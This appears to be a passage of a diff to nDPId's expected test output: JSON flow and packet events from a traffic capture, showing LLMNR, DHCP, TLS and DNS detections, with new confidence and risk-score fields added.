 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1470104411327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104411327,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7YAAAERvzfAqAUl4AAA\/NTqFOsAIqEiFTIAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1470104411735,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104411735,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7cAAAERvzbAqAUl4AAA\/NTqFOsAIqEiFTIAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104412556,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1470104412556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"ts_msec":1470104412556,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD\/DgU6wAp0RQMEAAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104412556,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1066,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104412556,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104412556,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1470104412556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1470104412556,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9eeQAAAERmPbAqAUx4AAA\/Pw4FOsAKTqNDBAAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104412556,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104412556,"flow_last_seen":1470104412556,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104412556,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1070,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1470104412962,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"ts_msec":1470104412962,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD\/DgU6wAp0RQMEAAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1470104412962,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1470104412962,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9eeYAAAERmPTAqAUx4AAA\/Pw4FOsAKTqNDBAAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1470104413679,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104413679,"pkt":"\/\/\/\/\/\/\/\/SNIkYwreCABFAAFIfjcAAEARNZ3AqAUp\/\/\/\/\/wBEAEMBNOoXAQEGAAJEmkEAAIAAwKgFKQAAAAAAAAAAAAAAAEjSJGMK3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEIPQcBSNIkYwreDAhrZXZpbi1QQzwITVNGVCA1LjA3DQEPAwYsLi8fIXn5K\/z\/AAAAAAAAAAAAAAAA"}
-00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"kevin-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}}
+00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"kevin-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}}
 00831{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1470104413815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104413815,"pkt":"TF4M6gNlYMVHBbyMCABFAAFIqYMAAEAR0r\/AqAUQwKh3AQBEAEMBNFvwAQEGABeXwM0AAAAAwKgFEAAAAAAAAAAAAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwkBAwYPd1\/8LC45AgXcPQcBYMVHBbyMMwQAdqcADAtNYWNCb29rLUFpcv8AAAAAAAAAAAAAAAAA"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01940{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1159,"pkt_l4_len":1125,"ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAAR5Xv9AAEAGm5bAqAUQHw1XJNFMAbv8UmzuBJ2iMIAYEABHkgAAAQEIChoPmUJf7iUmFwMDBEAsTuFq8CapSbqPXvcdxKrSs42tBtoxpkpEhbC8nI\/Z9Ti9iLIQZa5j5LW58IaLnxvFb3pZI+B1RxFJh1MX7hfwSESpGA\/xdeEaXYqNDQOsIrAzCG5XHIwlKsfFfn\/8RQrusMspya+fP6t\/Zg2Y6qSh9wcmn8mXJja+baLib9aevB6ce5XBs3a64vsRCgFs5NXASh55KEqD8yMaqdrRhlWFE6xGr6+SpmMLlVUwh48nOg1sBDe\/WYgSpLNk63+28tyTAwCIcOk3y10vOsyt7ZjgvztDnWOLtsn7\/6kMi3u2RdUB7eGGzM2NovPfgy\/qKgW2LAn44liW9WewObR4bp+dPFEvC0Y3+SW5bib2uvhBosFVLRK5YrZcwALZJXqqXhrrs6bu\/ljawzwGUMfLGQ2WSbwafdg9dJ73rdMEF1vEvfkETGUyJeWyPgg2G2DdxVtAlhAOni2Cb6JW3jV3kUvfm9gPSADxqT1QqjMQAvLuAsUt5WChMz4yp18RafOK\/1ZUrwxEzqELsHqkpHQf4ILnKSgg5+kGWAcGpm5BV27qLCy+WyMYEnVR9nevFTvw2OV3haLNTqpyfd4K7vOAMw+dbscVa9MHAeqcd7IQnXV8FbWdFXkC4wCM4E8hTvbfJf2QumZQ2fXLtiYd3sw8qoFpqMjmllDchFzska7DS7GVif4h6CnDNlZ4V+i1Eng9ELpwqlbXjyiEgMAhv7fPmI8e61K\/2gGY8OMdxcNsyD40PLGc9n2gJgcjUdhv3yk5lS0wyxma1JJ1Pa0sEMzvHL8CT6BpEzwkMJEMkciKtJ6VsJyummJhpN5MU9bS0CfSvwU0ARZvT+jD4m9Xd2enHnLuDwg4KR5SAhfN1vXfVfNlzPARDhSaBSDDpj8POKqEg5amwWHcBAQbXCOcOftYxPyyUfYlmBS91ssyfM9KHAYAPjuptOjnLxGz2x9TbNHcI4nTKruVWTV9ktQaEfrdpb\/HDqnCQBNGReenZ\/zWZ\/GfJml4Cm+qteZq9C64lEHb9+XokUZOr8X2s3gyZpMYfRa5jmhmO9xmHg7WJrK4eIDuKfpKwBJ058yTVyD7l0KDSW9GneGAGkjet6prc4idVI6G79csJZdQxaibq52QgAy0phRLTPkicoq0gLlZcIZm+Mml46cJhhEv0H26dA+KCoM5R5DwKEyBjuFs1QF3Y4+SDB+bc1Wt792AR8qtKWp6gbS96vJnCeIhTEA3KFLfapTzgvIE4vSB7KreGQj+tnmHbTp1DHeV+7y4PmFv5on7p4A6CEwD6f6fjePEHDfs2g0EYheGp2VL2NvXgnD2ikpgTUWxxOX40I6u2o6OTbP2RNpQ9m8KCHjwUMiisO3DyvkoNm8lZ6ZPWkev9k5y7txVdM8LiyyQoSG929RxmQGshqjjCdAsjAk+bbGLy98uGf3QTIpvsX0AlZ7fP\/qiRzGtQg=="}
@@ -446,13 +446,13 @@
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104414301,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XokV4DmNCDa64ASFtDXBQAAAgQFtAEBBAIBAwMH"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104414301,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0wvZAAFgGI+QfDVckwKgFEAG70UwEnaIw\/FJxM4AQAQMsTQAAAQEICl\/vEucaD5lC"}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1470104414301,"pkt":"ABAj4ACgYMVHBbyMCABFAAAohwxAAEAGuhfAqAUQwKhzS9F6Abs0INrrJFeA51AQIAAOqAAAIEVKRkRF"}
-00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1470104414395,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1470104414395,"pkt":"TF4M6gNlYMVHBbyMCABFAABL64oAAP8RYP7AqAUQqF8BAfeMADUAN6RcbYwBAAABAAAAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAE="}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1470104414402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"ts_msec":1470104414402,"pkt":"ABxCjnAxTF4M6gNlCABFAAET0UQAAPgRgXyoXwEBwKgFEAA194wA\/yfZbYyBgAABAAYAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAHADAAFAAEAAUxDAC0GZGwtb2JzCG9mZmljaWFsBGxpbmUFbmF2ZXICanAJZWRnZXN1aXRlA25ldADAOwAFAAEAAACwADUKY2FjLWRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwCWxpbmUtemVybwZha2FkbnPAY8B0AAUAAQAAAQAAEgVhMTg2NwJnMgZha2FtYWnAY8C1AAEAAQAAAAUABMtFUUnAtQABAAEAAAAFAATLRVFCwLUAAQABAAAABQAEPdw+2g=="}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"ts_msec":1470104414402,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.69.81.73"}}
